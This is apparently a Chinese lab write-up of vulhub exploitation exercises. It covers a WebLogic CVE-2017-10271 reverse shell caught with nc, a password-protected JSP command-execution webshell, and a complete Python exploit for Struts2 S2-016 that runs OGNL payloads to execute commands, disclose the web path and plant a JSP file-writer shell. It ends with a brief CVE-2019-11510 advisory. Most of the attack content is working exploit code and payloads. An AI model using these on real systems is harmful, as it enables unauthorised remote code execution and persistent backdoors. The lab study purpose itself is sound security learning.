vulhub环境搭建

# Download the latest version of vulhub
git clone https://github.com/vulhub/vulhub.git  

# Enter the directory of the vulnerability you want to run (one per CVE/issue)
cd /path/to/vuln/ 

# Compile the images locally (optional; otherwise they are pulled on "up")
docker-compose build 

# Run the environment in the background
docker-compose up -d 

weblogic-CVE-2017-10271

原理

操作步骤

1、cd .../vulhub/weblogic/CVE-2017-10271
2、docker-compose up -d
3、cat README.md

方法一

clipboard.png
监听图中圈出来的地址(此地址为网关地址-尾号为1)

本实验使用docker容器中看到的网关ip地址：利用命令docker exec -it [docker-name] bash进入容器，执行ifconfig查看

clipboard.png
找到ip172.18.0.2,把尾数改为1放入数据包中:

clipboard.png
先不要点击‘Go’,利用命令nc -l -p 21监听21端口

clipboard.png

然后点击Go,终端就会反弹一个shell,如下:

clipboard.png

方法二

README里面提供了一个写入jspshell的方法:

clipboard.png
这里把圈起来的内容改为jsp一句话后门:

<%-- Command-execution scriptlet: when the `pwd` query parameter equals "023", the
     `i` parameter is handed to Runtime.getRuntime().exec() and the process output
     is echoed back inside <pre>. From a detection standpoint, exec() fed directly
     from request.getParameter() plus the fixed parameter names are the strings a
     webshell scanner keys on in .jsp files. --%>
<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>
# 有回显、带密码验证的

在burpsuite上直接发包:

clipboard.png

然后直接在网页上访问http://localhost:7001/bea_wls_internal/test1.jsp?pwd=023&i=ls

clipboard.png

struts2/s2-016

脚本不再逐行解释。提供两种方法：一种直接写入jspshell，另一种写入一个页面（该页面提供一个写入jsp木马的平台）

#-*- coding:utf8 -*-
import getopt,sys,requests,re

# JSP scriptlet kept as a string: when the `pwd` request parameter equals "023"
# it runs the `i` parameter via Runtime.exec and echoes the output inside <pre>.
# NOTE(review): in the visible script this constant is assigned but never
# referenced — Write_JspShell() posts JspShell (the upload form), not JspShell1.
JspShell1="""
<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>
"""

# Hard-coded target: a local lab instance on 8080 (presumably the vulhub
# struts2/s2-016 container from the section heading above).
url = "http://127.0.0.1:8080/index.action"
# URL-encoded OGNL expression sent through the `redirect:` prefix. It reads the
# servlet context's real path for "/" and writes it straight into the HTTP
# response; Getwebpath() sends it and parses the reply.
path_payload = 'redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28"%2F"%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D'

# JSP "file writer" page that Write_JspShell() POSTs to the target. When it is
# requested with act=up it deletes any existing file at the path given in the
# `url` field and writes the `text` field into it (printing "Failed!!" on an
# exception, "Success~!!" otherwise); on a plain GET it renders a form whose
# default path is the webapp's real path.
JspShell = """
<%@ page language="java" %><jsp:directive.page import="java.io.File"/><jsp:directive.page import="java.io.OutputStream"/><jsp:directive.page import="java.io.FileOutputStream"/>
<html>
<%
int i=0;
String method=request.getParameter("act");
if(method!=null&&method.equals("up")){
String url=request.getParameter("url");
String text=request.getParameter("text");
File f=new File(url);
if(f.exists()){
f.delete();
}
try{
OutputStream o=new FileOutputStream(f);
o.write(text.getBytes());
o.close();
}catch(Exception e){
i++;
%>
Failed!!
<%
}
}
if(i==0){
%>
Success~!!
<%
}
%>
<body>
<form action='?act=up' method='post'>
<input size="100" value="<%=application.getRealPath("/") %>" name="url"><br>
<textarea rows="20" cols="80" name="text"></textarea><br>
<input type="submit" value="up" name="text"/>
</form>
</body>
</html>
"""

def info():
    """Print the command-line usage summary, one supported option per line."""
    usage_lines = (
        '-p webpath',
        '-d Command',
        '-w write jspshell',
    )
    for line in usage_lines:
        print(line)

def CommandExec(url,Command):
    """Send `Command` to `url` inside an s2-016 `redirect:` OGNL payload and print the reply.

    The space-separated words of Command become the String[] handed to
    ProcessBuilder in the expression; up to 50000 chars of the process output
    are written into the HTTP response. Success is only guessed: a reply that
    does not contain '<html' is treated as command output, anything else (an
    HTML error page) as failure.
    """
    InputCommand = ""
    for x in Command.split(' '):
        InputCommand += '\'%s\',' % x  # single-quote each word and separate with commas
    Payload = 'redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{'
    Payload += InputCommand.rstrip(',')  # drop the trailing comma
    Payload +='}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}'
    Result = Requests(url,Payload)
    if Result.find('<html') == -1: # heuristic: no HTML page means the command ran
        print('执行命令成功:\n'+Result)
    else:
        print('Fail...')

def Getwebpath():
    """Return the target webapp's real path as reported by the module-level `path_payload`.

    Uses the module-level `url`. All whitespace is stripped from the reply and
    its last character dropped (presumably a trailing separator — TODO confirm).
    Note that Requests() returns an exception message as a plain string on
    failure, and that text goes through the same processing unchanged.
    """
    webpath = Requests(url, path_payload)
    webpath = "".join(webpath.split())
    webpath = webpath[:-1]
    return(webpath)

def Write_JspShell(url,SavePath):
    """POST the JspShell page body to `url` so the OGNL payload stores it as <webpath>/test.jsp.

    SavePath is accepted but not used in this body: the destination is always
    Getwebpath() + '/test.jsp'. Getwebpath() is called twice, so two extra
    requests go to the target before the POST. Returns the server's reply text
    when it does not look like an HTML page, the literal 'Fail.....>_<'
    otherwise, or the exception message if the request itself fails.
    """
    WebShellPath = "'"+Getwebpath()+"/test.jsp'"
    #print (WebShellPath)
    Payload = "?redirect:${%23path%3d"
    Payload += WebShellPath
    Payload += ",%23file%3dnew+java.io.File(%23path),%23file.createNewFile(),%23buf%3dnew+char[50000],%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest').getReader().read(%23buf),%23out%3dnew+java.io.BufferedWriter(new+java.io.FileWriter(%23file)),%23str%3dnew+java.lang.String(%23buf),%23out.write(%23str.trim()),%23out.close(),%23stm%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23stm.getWriter().println("
    Payload += '"'+Getwebpath()+'/test.jsp Get Shell!!!"'  # message the server echoes back on success
    Payload += '),%23stm.getWriter().flush(),%23stm.getWriter().close()}'

    url += Payload
    #print(url)
    try:
        r = requests.post(url, data=JspShell , timeout = 10)# the request body becomes the file content
        if r.text.find('<html') == -1:# no HTML page: treated as written
            return r.text
        else:# HTML error page: treated as failed
            return 'Fail.....>_<'
    except Exception as e:
        return str(e)


def Requests(url, Data):
    """GET ``url?Data`` and return the response body as text.

    Any exception raised while sending the request (connection errors,
    timeouts, ...) is converted to its string form and returned in place of a
    body, so callers cannot tell an error message apart from real content.
    """
    target = url + '?' + Data
    try:
        reply = requests.get(target)
    except Exception as err:
        return str(err)
    return reply.text



if __name__ == '__main__' :
    # Option spec "d:wp": -d takes a value, -w and -p are declared as flags.
    # Any unknown option falls through to the usage text and exit code 2.
    try:
        opts, args = getopt.getopt(sys.argv[1:],"d:wp")
    except:
        info()
        sys.exit(2)
    for opt, value in opts:
        if opt == '-d':
            CommandExec(url,value)  # prints the result itself
        elif opt == '-w':
            print(Write_JspShell(url,value))
        elif opt == '-p':
            print('webpath:'+Getwebpath())

clipboard.png

clipboard.png

CVE-2019-11510

漏洞介绍

Pulse Secure Pulse Connect Secure 授权问题漏洞
Pulse Secure Pulse Connect Secure(又名PCS,前称Juniper Junos Pulse)是美国Pulse Secure公司的一套SSL VPN解决方案。

Pulse Secure PCS 9.0RX版本、8.3RX版本和8.2RX版本中存在授权问题漏洞。该漏洞源于网络系统或产品中缺少身份验证措施或身份验证强度不足。

危害影响

成功利用上述漏洞可导致任意文件读取

修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://kb.pulsesecure.net/ar...

